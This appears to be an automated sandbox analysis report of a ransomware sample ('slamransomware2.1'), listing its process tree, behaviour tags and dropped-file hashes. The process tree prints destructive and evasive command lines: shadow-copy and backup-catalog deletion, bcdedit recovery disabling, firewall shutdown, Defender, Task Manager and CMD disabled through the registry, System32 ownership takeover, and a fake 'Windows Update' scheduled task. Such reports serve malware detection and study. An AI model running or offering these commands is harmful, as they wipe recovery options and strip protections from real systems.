slamransomware2.1.execmd.exeslam.execmd.exelo.execmd.exeWindowsFormsApp1.execmd.exembr.execmd.exedescription pid process target process PID 3064 wrote to memory of 4908 3064 slamransomware2.1.exe cmd.exe PID 3064 wrote to memory of 4908 3064 slamransomware2.1.exe cmd.exe PID 3064 wrote to memory of 4908 3064 slamransomware2.1.exe cmd.exe PID 4908 wrote to memory of 2224 4908 cmd.exe uac.exe PID 4908 wrote to memory of 2224 4908 cmd.exe uac.exe PID 4908 wrote to memory of 2224 4908 cmd.exe uac.exe PID 1980 wrote to memory of 4416 1980 slam.exe cmd.exe PID 1980 wrote to memory of 4416 1980 slam.exe cmd.exe PID 1980 wrote to memory of 4416 1980 slam.exe cmd.exe PID 4416 wrote to memory of 4712 4416 cmd.exe lector_mbr.exe PID 4416 wrote to memory of 4712 4416 cmd.exe lector_mbr.exe PID 4416 wrote to memory of 4712 4416 cmd.exe lector_mbr.exe PID 4416 wrote to memory of 4564 4416 cmd.exe lo.exe PID 4416 wrote to memory of 4564 4416 cmd.exe lo.exe PID 4416 wrote to memory of 4492 4416 cmd.exe netsh.exe PID 4416 wrote to memory of 4492 4416 cmd.exe netsh.exe PID 4416 wrote to memory of 4492 4416 cmd.exe netsh.exe PID 4564 wrote to memory of 1376 4564 lo.exe cmd.exe PID 4564 wrote to memory of 1376 4564 lo.exe cmd.exe PID 1376 wrote to memory of 204 1376 cmd.exe takeown.exe PID 1376 wrote to memory of 204 1376 cmd.exe takeown.exe PID 1376 wrote to memory of 188 1376 cmd.exe icacls.exe PID 1376 wrote to memory of 188 1376 cmd.exe icacls.exe PID 4564 wrote to memory of 4068 4564 lo.exe WindowsFormsApp1.exe PID 4564 wrote to memory of 4068 4564 lo.exe WindowsFormsApp1.exe PID 4564 wrote to memory of 4068 4564 lo.exe WindowsFormsApp1.exe PID 4416 wrote to memory of 4844 4416 cmd.exe netsh.exe PID 4416 wrote to memory of 4844 4416 cmd.exe netsh.exe PID 4416 wrote to memory of 4844 4416 cmd.exe netsh.exe PID 4068 wrote to memory of 4724 4068 WindowsFormsApp1.exe cmd.exe PID 4068 wrote to memory of 4724 4068 WindowsFormsApp1.exe cmd.exe PID 4068 wrote to memory of 4724 4068 WindowsFormsApp1.exe cmd.exe PID 4068 wrote to memory of 1600 4068 WindowsFormsApp1.exe mbr.exe PID 4068 wrote to memory of 1600 4068 WindowsFormsApp1.exe mbr.exe PID 4068 wrote to memory of 1600 4068 WindowsFormsApp1.exe mbr.exe PID 4068 wrote to memory of 660 4068 WindowsFormsApp1.exe cmd.exe PID 4068 wrote to memory of 660 4068 WindowsFormsApp1.exe cmd.exe PID 4068 wrote to memory of 660 4068 WindowsFormsApp1.exe cmd.exe PID 4724 wrote to memory of 2552 4724 cmd.exe takeown.exe PID 4724 wrote to memory of 2552 4724 cmd.exe takeown.exe PID 4724 wrote to memory of 2552 4724 cmd.exe takeown.exe PID 1600 wrote to memory of 2388 1600 mbr.exe schtasks.exe PID 1600 wrote to memory of 2388 1600 mbr.exe schtasks.exe PID 1600 wrote to memory of 2388 1600 mbr.exe schtasks.exe PID 660 wrote to memory of 3788 660 cmd.exe vssadmin.exe PID 660 wrote to memory of 3788 660 cmd.exe vssadmin.exe PID 660 wrote to memory of 3788 660 cmd.exe vssadmin.exe PID 4724 wrote to memory of 4956 4724 cmd.exe icacls.exe PID 4724 wrote to memory of 4956 4724 cmd.exe icacls.exe PID 4724 wrote to memory of 4956 4724 cmd.exe icacls.exe PID 660 wrote to memory of 4236 660 cmd.exe WMIC.exe PID 660 wrote to memory of 4236 660 cmd.exe WMIC.exe PID 660 wrote to memory of 4236 660 cmd.exe WMIC.exe PID 4416 wrote to memory of 4964 4416 cmd.exe netsh.exe PID 4416 wrote to memory of 4964 4416 cmd.exe netsh.exe PID 4416 wrote to memory of 4964 4416 cmd.exe netsh.exe PID 4416 wrote to memory of 1752 4416 cmd.exe netsh.exe PID 4416 wrote to memory of 1752 4416 cmd.exe netsh.exe PID 4416 wrote to memory of 1752 4416 cmd.exe netsh.exe PID 4416 wrote to memory of 2080 4416 cmd.exe netsh.exe PID 4416 wrote to memory of 2080 4416 cmd.exe netsh.exe PID 4416 wrote to memory of 2080 4416 cmd.exe netsh.exe PID 4416 wrote to memory of 3032 4416 cmd.exe reg.exe PID 4416 wrote to memory of 3032 4416 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\slamransomware2.1.exe"C:\Users\Admin\AppData\Local\Temp\slamransomware2.1.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\66EC.tmp\slamloader.bat" "C:\Users\Admin\AppData\Local\Temp\slamransomware2.1.exe""2⤵
- Suspicious use of WriteProcessMemory
-
C:\temp\uac.exeuac.exe 34 C:\temp\slam.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\temp\slam.exe"C:\temp\slam.exe"1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\D8B1.tmp\slam.bat" "C:\temp\slam.exe""2⤵
- Suspicious use of WriteProcessMemory
-
C:\temp\lector_mbr.exelector_mbr.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Writes to the Master Boot Record (MBR)
-
C:\temp\lo.exelo.exe3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System325⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32 /grant "Admin:F"5⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\temp\WindowsFormsApp1.exe"C:\temp\WindowsFormsApp1.exe"4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Modifies extensions of user files
- Drops desktop.ini file(s)
- Sets desktop wallpaper using registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\System326⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\System32 /grant "Admin:F"6⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\temp\mbr.exe"C:\temp\mbr.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
- Writes to the Master Boot Record (MBR)
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\temp\mbr.exe"6⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet6⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off3⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set domainprofile state off3⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set privateprofile state off3⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set publicprofile state off3⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoWinKeys /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\System\ /v DisableCMD /t REG_DWORD /d 2 /f3⤵
- Modifies registry key
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffd29a24f50,0x7ffd29a24f60,0x7ffd29a24f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1596 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1680 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2132 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2616 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2588 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3568 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4236 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4716 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4904 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4892 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4764 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5128 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4764 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4760 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4824 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4940 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=848 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4704 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=776 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2488 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4064 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4992 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4992 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2436 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4060 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2404 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4948 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5156 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1360 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3964 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4248 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5092 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5128 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1620,5262345652679410971,6449072551417580333,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4800 /prefetch:82⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"1⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"2⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1556.0.1683401816\490683855" -parentBuildID 20200403170909 -prefsHandle 1548 -prefMapHandle 1540 -prefsLen 1 -prefMapSize 220115 -appdir "C:\Program Files\Mozilla Firefox\browser" - 1556 "\\.\pipe\gecko-crash-server-pipe.1556" 1628 gpu3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1556.3.1904026127\1951183869" -childID 1 -isForBrowser -prefsHandle 2224 -prefMapHandle 2220 -prefsLen 156 -prefMapSize 220115 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 1556 "\\.\pipe\gecko-crash-server-pipe.1556" 2236 tab3⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1556.13.1490602068\8265539" -childID 2 -isForBrowser -prefsHandle 3416 -prefMapHandle 3412 -prefsLen 6938 -prefMapSize 220115 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 1556 "\\.\pipe\gecko-crash-server-pipe.1556" 3428 tab3⤵
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe"1⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5116 CREDAT:82945 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\elevation_service.exe"1⤵
- Drops file in Program Files directory
-
C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4792_2138878341\ChromeRecovery.exe"C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4792_2138878341\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=89.0.4389.114 --sessionid={7711465a-bc55-4bce-8d53-e737ac179a98} --system2⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4792_2138878341\ChromeRecovery.exeFilesize
253KB
MD549ac3c96d270702a27b4895e4ce1f42a
SHA155b90405f1e1b72143c64113e8bc65608dd3fd76
SHA25682aa3fd6a25cda9e16689cfadea175091be010cecae537e517f392e0bef5ba0f
SHA512b62f6501cb4c992d42d9097e356805c88ac4ac5a46ead4a8eee9f8cbae197b2305da8aab5b4a61891fe73951588025f2d642c32524b360687993f98c913138a0
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776Filesize
471B
MD5ceb27c5a4ddfb187c4249a72504c7c8e
SHA11ad64626e4164455d19d5f88ef582c4995bfde79
SHA256f218ba665e9323513337c50a31c4c5ff4501e3c386477149e3964a760de327df
SHA512ceb5d4a665b6835c39b7f2b2841f3ce8b10236f8bc37b1dc99b2182303363f7f3f5c25d6cf7a84e5fb541fe8988c4af6b86abdd0f3ed9f6ddaca0e8ce0a1e3a3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776Filesize
434B
MD500b92e51c4ad58c82bdad9267ab2fcb6
SHA17db4321ca71dddaa3f2f814074b988ea349d7bd4
SHA2565de660145df569710eb10e2390283a254afa0754a449e39f707321a45c9b373a
SHA512a09c67ffc91945e01042f9c6b003f576b68165539840b01633ebc66d6ea045e2e6d6dc74a4d5d99c0df53a11f712fff76078546ae086ea4f26c33d912f121363
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\RecoveryImproved\1.3.36.141\Recovery.crx3Filesize
141KB
MD5ea1c1ffd3ea54d1fb117bfdbb3569c60
SHA110958b0f690ae8f5240e1528b1ccffff28a33272
SHA2567c3a6a7d16ac44c3200f572a764bce7d8fa84b9572dd028b15c59bdccbc0a77d
SHA5126c30728cac9eac53f0b27b7dbe2222da83225c3b63617d6b271a6cfedf18e8f0a8dffa1053e1cbc4c5e16625f4bbc0d03aa306a946c9d72faa4ceb779f8ffcaf
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\AIJ8206M.cookieFilesize
615B
MD54e37f1d34f87179f497c598ae191fa0b
SHA1fa63582ac17f7e5f391ef6e6ad2821d182c6c53e
SHA2561e0d39f16dfc7202b93fbb75b5d56b4fba1f9f00e50ec3bf4cb03a5e446af291
SHA512a8542f256f8102e617a5b7d3c3f859109b1b8a5b86f580f2ab47bb12b43ca1a7052f38e951cc33d27f6d7abb9adae4a83d0b3f0e0c0fce8b04b593f06233daf4
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\ZR9S9WO4.cookieFilesize
615B
MD5ad6e089f9ac26ad7ebf1bf5d25e61bbd
SHA1b71027d96e20ffd3a8e422d4a2d060e0eaae47f0
SHA25607d0d28131d7ccc81d0f2bc2bb7bd3d00cdc02c2de60a237f1912730e0943a82
SHA512f9f926c874ecf7ca5f71333653a8d6e72df606b82b45f5a4008021e38bfc555eca08d66b038df8d8696b41dd19f830df6a4222303b58baf19305b2452cda1eaf
-
C:\Users\Admin\AppData\Local\Temp\66EC.tmp\slamloader.batFilesize
220B
MD5dde74ab5efc28a2946e166a97f5743bb
SHA13ee33b652ce15f38559104ebfd4303215c400290
SHA256b4a5de5423c09f118aeffac94004b46c0fc6f67e70d48c62c2b9f2524c5f7f08
SHA512d874ac72c81000d897ed2fd0ce06c124170b8a2b65f8759ab1efaa9ef69b6aaaf241e1d62545449779d1364b58eeaa588c032dcc25aa5e137f7fa2f08c095a84
-
C:\Users\Admin\AppData\Local\Temp\D8B1.tmp\slam.batFilesize
1KB
MD53a816545bf20c9afd041df65e7454ed5
SHA122fd9a495e0c7924874d9f263a60b6afb41a8cf0
SHA256501fd7e24741c4856f392f3de15cc0c9ccd93d3cad6a8c8d36ec5133efa3c18b
SHA512ca9e3242518a29082bce1eb269ab965042d8a78a9e2c7306dd040129690e2dde3a4a371cf1c0507bc53d003ec630ca3f3a3e9132dcf6b9ce6cb3e323c051cc90
-
C:\Users\Admin\AppData\Local\Temp\slam.exeFilesize
2.1MB
MD5768722fc2f95bbfd54c366064907acca
SHA14f1c4acb9dfef40555702ab6fcf6b2e086e91652
SHA256d4b35a4c7d82a2584a8ea10b3b4b12f5f19e5e34b6f24fb2a554f0c5c8b7906f
